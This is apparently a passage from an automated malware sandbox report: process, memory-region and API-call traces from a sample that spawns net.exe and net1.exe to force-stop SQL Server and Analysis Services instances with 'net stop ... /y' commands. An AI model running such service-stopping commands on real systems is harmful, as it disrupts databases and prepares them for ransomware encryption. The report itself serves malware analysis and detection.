entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 7476 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 7477 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 7478 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 7479 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7480 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7481 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 7482 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 7483 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7484 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7501 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 622 os_tid = 0xa2c [0102.860] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fcf0 | out: lpSystemTimeAsFileTime=0x26fcf0*(dwLowDateTime=0xf27a4d50, dwHighDateTime=0x1d48689)) [0102.860] GetCurrentProcessId () returned 0xb58 [0102.860] GetCurrentThreadId () returned 0xa2c [0102.860] GetTickCount () returned 0x237b2 [0102.860] QueryPerformanceCounter (in: lpPerformanceCount=0x26fcf8 | out: lpPerformanceCount=0x26fcf8*=1814977800000) returned 1 [0102.862] GetModuleHandleW (lpModuleName=0x0) returned 0xff360000 [0102.862] __set_app_type (_Type=0x1) [0102.862] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff379c9c) returned 0x0 [0102.862] __getmainargs (in: _Argc=0xff384780, _Argv=0xff384790, _Env=0xff384788, _DoWildCard=0, _StartInfo=0xff38479c | out: _Argc=0xff384780, _Argv=0xff384790, _Env=0xff384788) returned 0 [0102.862] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0102.862] GetConsoleOutputCP () returned 0x1b5 [0102.904] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff38cec0 | out: lpCPInfo=0xff38cec0) returned 1 [0102.904] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0102.906] sprintf_s (in: _DstBuf=0x26fc98, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0102.907] setlocale (category=0, locale=".437") returned="English_United States.437" [0102.908] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0102.908] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0102.908] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSOLAP$TPS /y" [0102.908] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x26fa30, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0102.908] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0102.909] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x26fc88 | out: Buffer=0x26fc88*=0xb4d50) returned 0x0 [0102.909] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x26fc88 | out: Buffer=0x26fc88*=0xbc0f0) returned 0x0 [0102.909] _fileno (_File=0x7fefdba2a80) returned 0 [0102.909] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0102.909] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0102.909] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0102.909] _wcsicmp (_String1="config", _String2="stop") returned -16 [0102.909] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0102.909] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0102.909] _wcsicmp (_String1="file", _String2="stop") returned -13 [0102.909] _wcsicmp (_String1="files", _String2="stop") returned -13 [0102.909] _wcsicmp (_String1="group", _String2="stop") returned -12 [0102.909] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0102.909] _wcsicmp (_String1="help", _String2="stop") returned -11 [0102.909] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0102.909] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0102.909] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0102.909] _wcsicmp (_String1="session", _String2="stop") returned -15 [0102.909] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0102.909] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0102.909] _wcsicmp (_String1="share", _String2="stop") returned -12 [0102.909] _wcsicmp (_String1="start", _String2="stop") returned -14 [0102.909] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0102.909] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0102.909] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0102.910] _wcsicmp (_String1="accounts", _String2="MSOLAP$TPS") returned -12 [0102.910] _wcsicmp (_String1="computer", _String2="MSOLAP$TPS") returned -10 [0102.910] _wcsicmp (_String1="config", _String2="MSOLAP$TPS") returned -10 [0102.910] _wcsicmp (_String1="continue", _String2="MSOLAP$TPS") returned -10 [0102.910] _wcsicmp (_String1="cont", _String2="MSOLAP$TPS") returned -10 [0102.910] _wcsicmp (_String1="file", _String2="MSOLAP$TPS") returned -7 [0102.910] _wcsicmp (_String1="files", _String2="MSOLAP$TPS") returned -7 [0102.910] _wcsicmp (_String1="group", _String2="MSOLAP$TPS") returned -6 [0102.910] _wcsicmp (_String1="groups", _String2="MSOLAP$TPS") returned -6 [0102.910] _wcsicmp (_String1="help", _String2="MSOLAP$TPS") returned -5 [0102.910] _wcsicmp (_String1="helpmsg", _String2="MSOLAP$TPS") returned -5 [0102.910] _wcsicmp (_String1="localgroup", _String2="MSOLAP$TPS") returned -1 [0102.910] _wcsicmp (_String1="pause", _String2="MSOLAP$TPS") returned 3 [0102.910] _wcsicmp (_String1="session", _String2="MSOLAP$TPS") returned 6 [0102.910] _wcsicmp (_String1="sessions", _String2="MSOLAP$TPS") returned 6 [0102.910] _wcsicmp (_String1="sess", _String2="MSOLAP$TPS") returned 6 [0102.910] _wcsicmp (_String1="share", _String2="MSOLAP$TPS") returned 6 [0102.910] _wcsicmp (_String1="start", _String2="MSOLAP$TPS") returned 6 [0102.910] _wcsicmp (_String1="stats", _String2="MSOLAP$TPS") returned 6 [0102.910] _wcsicmp (_String1="statistics", _String2="MSOLAP$TPS") returned 6 [0102.910] _wcsicmp (_String1="stop", _String2="MSOLAP$TPS") returned 6 [0102.910] _wcsicmp (_String1="time", _String2="MSOLAP$TPS") returned 7 [0102.910] _wcsicmp (_String1="user", _String2="MSOLAP$TPS") returned 8 [0102.910] _wcsicmp (_String1="users", _String2="MSOLAP$TPS") returned 8 [0102.910] _wcsicmp (_String1="msg", _String2="MSOLAP$TPS") returned -8 [0102.910] _wcsicmp (_String1="messenger", _String2="MSOLAP$TPS") returned -14 [0102.910] _wcsicmp (_String1="receiver", _String2="MSOLAP$TPS") returned 5 [0102.910] _wcsicmp (_String1="rcv", _String2="MSOLAP$TPS") returned 5 [0102.910] _wcsicmp (_String1="netpopup", _String2="MSOLAP$TPS") returned 1 [0102.910] _wcsicmp (_String1="redirector", _String2="MSOLAP$TPS") returned 5 [0102.910] _wcsicmp (_String1="redir", _String2="MSOLAP$TPS") returned 5 [0102.911] _wcsicmp (_String1="rdr", _String2="MSOLAP$TPS") returned 5 [0102.911] _wcsicmp (_String1="workstation", _String2="MSOLAP$TPS") returned 10 [0102.911] _wcsicmp (_String1="work", _String2="MSOLAP$TPS") returned 10 [0102.911] _wcsicmp (_String1="wksta", _String2="MSOLAP$TPS") returned 10 [0102.911] _wcsicmp (_String1="prdr", _String2="MSOLAP$TPS") returned 3 [0102.911] _wcsicmp (_String1="devrdr", _String2="MSOLAP$TPS") returned -9 [0102.911] _wcsicmp (_String1="lanmanworkstation", _String2="MSOLAP$TPS") returned -1 [0102.911] _wcsicmp (_String1="server", _String2="MSOLAP$TPS") returned 6 [0102.911] _wcsicmp (_String1="svr", _String2="MSOLAP$TPS") returned 6 [0102.911] _wcsicmp (_String1="srv", _String2="MSOLAP$TPS") returned 6 [0102.911] _wcsicmp (_String1="lanmanserver", _String2="MSOLAP$TPS") returned -1 [0102.911] _wcsicmp (_String1="alerter", _String2="MSOLAP$TPS") returned -12 [0102.911] _wcsicmp (_String1="netlogon", _String2="MSOLAP$TPS") returned 1 [0102.911] _wcsupr (in: _String="MSOLAP$TPS" | out: _String="MSOLAP$TPS") returned="MSOLAP$TPS" [0102.911] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0xbce00 [0102.915] GetServiceKeyNameW (in: hSCManager=0xbce00, lpDisplayName="MSOLAP$TPS", lpServiceName=0xff385750, lpcchBuffer=0x26fba8 | out: lpServiceName="", lpcchBuffer=0x26fba8) returned 0 [0102.916] _wcsicmp (_String1="msg", _String2="MSOLAP$TPS") returned -8 [0102.916] _wcsicmp (_String1="messenger", _String2="MSOLAP$TPS") returned -14 [0102.916] _wcsicmp (_String1="receiver", _String2="MSOLAP$TPS") returned 5 [0102.916] _wcsicmp (_String1="rcv", _String2="MSOLAP$TPS") returned 5 [0102.916] _wcsicmp (_String1="redirector", _String2="MSOLAP$TPS") returned 5 [0102.916] _wcsicmp (_String1="redir", _String2="MSOLAP$TPS") returned 5 [0102.916] _wcsicmp (_String1="rdr", _String2="MSOLAP$TPS") returned 5 [0102.916] _wcsicmp (_String1="workstation", _String2="MSOLAP$TPS") returned 10 [0102.917] _wcsicmp (_String1="work", _String2="MSOLAP$TPS") returned 10 [0102.917] _wcsicmp (_String1="wksta", _String2="MSOLAP$TPS") returned 10 [0102.917] _wcsicmp (_String1="prdr", _String2="MSOLAP$TPS") returned 3 [0102.917] _wcsicmp (_String1="devrdr", _String2="MSOLAP$TPS") returned -9 [0102.917] _wcsicmp (_String1="lanmanworkstation", _String2="MSOLAP$TPS") returned -1 [0102.917] _wcsicmp (_String1="server", _String2="MSOLAP$TPS") returned 6 [0102.917] _wcsicmp (_String1="svr", _String2="MSOLAP$TPS") returned 6 [0102.917] _wcsicmp (_String1="srv", _String2="MSOLAP$TPS") returned 6 [0102.917] _wcsicmp (_String1="lanmanserver", _String2="MSOLAP$TPS") returned -1 [0102.917] _wcsicmp (_String1="alerter", _String2="MSOLAP$TPS") returned -12 [0102.917] _wcsicmp (_String1="netlogon", _String2="MSOLAP$TPS") returned 1 [0102.917] NetServiceControl (in: servername=0x0, service="MSOLAP$TPS", opcode=0x0, arg=0x0, bufptr=0x26fbb0 | out: bufptr=0x26fbb0) returned 0x889 [0102.918] wcscpy_s (in: _Destination=0xff3880d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0102.918] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0102.919] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff385b50, nSize=0x800, Arguments=0xff387f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0102.920] GetFileType (hFile=0xb) returned 0x2 [0102.920] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fa78 | out: lpMode=0x26fa78) returned 1 [0102.920] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff385b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x26fa70, lpReserved=0x0 | out: lpBuffer=0xff385b50*, lpNumberOfCharsWritten=0x26fa70*=0x1e) returned 1 [0102.921] GetFileType (hFile=0xb) returned 0x2 [0102.921] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fa78 | out: lpMode=0x26fa78) returned 1 [0102.921] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff361efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26fa70, lpReserved=0x0 | out: lpBuffer=0xff361efc*, lpNumberOfCharsWritten=0x26fa70*=0x2) returned 1 [0102.921] _ultow (in: _Dest=0x889, _Radix=2554592 | out: _Dest=0x889) returned="2185" [0102.921] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff385b50, nSize=0x800, Arguments=0xff387f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0102.922] GetFileType (hFile=0xb) returned 0x2 [0102.922] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fa78 | out: lpMode=0x26fa78) returned 1 [0102.922] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff385b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x26fa70, lpReserved=0x0 | out: lpBuffer=0xff385b50*, lpNumberOfCharsWritten=0x26fa70*=0x34) returned 1 [0102.923] GetFileType (hFile=0xb) returned 0x2 [0102.923] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fa78 | out: lpMode=0x26fa78) returned 1 [0102.923] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff361efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26fa70, lpReserved=0x0 | out: lpBuffer=0xff361efc*, lpNumberOfCharsWritten=0x26fa70*=0x2) returned 1 [0102.923] NetApiBufferFree (Buffer=0xb4d50) returned 0x0 [0102.923] NetApiBufferFree (Buffer=0xbc0f0) returned 0x0 [0102.923] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSOLAP$TPS /y" [0102.923] exit (_Code=2) Process: id = "182" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x58727000" os_pid = "0x51c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSSQL$SBSMONITORING /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7485 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7486 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7487 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7488 start_va = 0xb0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 7489 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7490 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 7491 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7492 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 7493 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7494 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7495 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 7496 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 7497 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 7498 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7499 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 623 os_tid = 0xa58 Process: id = "183" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5a847000" os_pid = "0xc4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSSQL$SHAREPOINT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7522 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7523 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7524 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7525 start_va = 0xb0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 7526 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7527 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 7528 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7529 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 7530 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7531 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7532 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 7533 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 7534 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 7535 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7536 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 625 os_tid = 0xb50 Process: id = "184" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5919f000" os_pid = "0xbf0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "178" os_parent_pid = "0x828" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$PRACTTICEBGC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7537 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7538 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7539 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7540 start_va = 0xf0000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 7541 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7542 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 7543 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7544 start_va = 0xff970000 end_va = 0xff9a2fff entry_point = 0xff970000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 7545 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7546 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7547 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 7548 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 7549 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 7550 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7551 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7552 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7553 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 7554 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7555 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7556 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 7557 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 7558 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 7559 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 7560 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 7561 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 7562 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 7563 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 7564 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 7565 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 7566 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 7567 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 7568 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 7569 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7570 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 